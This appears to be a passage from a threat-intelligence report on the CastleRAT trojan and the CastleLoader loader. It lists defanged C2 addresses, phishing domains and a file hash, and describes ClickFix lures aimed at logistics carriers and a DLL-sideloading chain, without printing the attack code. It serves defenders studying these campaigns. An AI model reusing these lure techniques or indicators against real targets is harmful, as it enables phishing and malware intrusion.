CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.

Infrastructure Analysis

Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in Figure 3, Insikt Group observed two CastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, 104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.

Figure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)

Notably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00, and the server responds with trailing bytes 9e ff 74 70 before closing the connection. A similar exchange occurs with 5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00 00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.

Clustering by RC4 Key

Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see Figure 4). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.

Figure 4: RC4 key clusters (Source: Recorded Future)

CastleLoader

Infrastructure Analysis

Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in Appendix A. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.

Notably, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.

Activity Clusters

Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 4). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.

Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.

Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160

Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed exploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight & Analytics and Loadlink Technologies for multiple purposes.

Attack Flow

Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5 illustrates a high-level overview of the phishing attack flow.

Figure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)

The attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example, englandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.

The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt Group has observed multiple variations of these landing pages.

Figure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)

Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, loadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.

Figure 7: “dpeforms” page found in Google Search (Source: Recorded Future)

After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see Figure 8). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.

Figure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)

By following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using pythonw.exe, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.

Figure 9: ClickFix command (Source: Recorded Future)

Use of Compromised Infrastructure

As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.

Infrastructure Analysis

Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of these domains include the subdomain apps[.]englandlogistics (for example, apps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, loadstrucking[.]com, instead featured the subdomain app[.]england, following a similar naming pattern.

Insikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between July 6 and September 26, 2025, which was serving the file newtag.zip (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.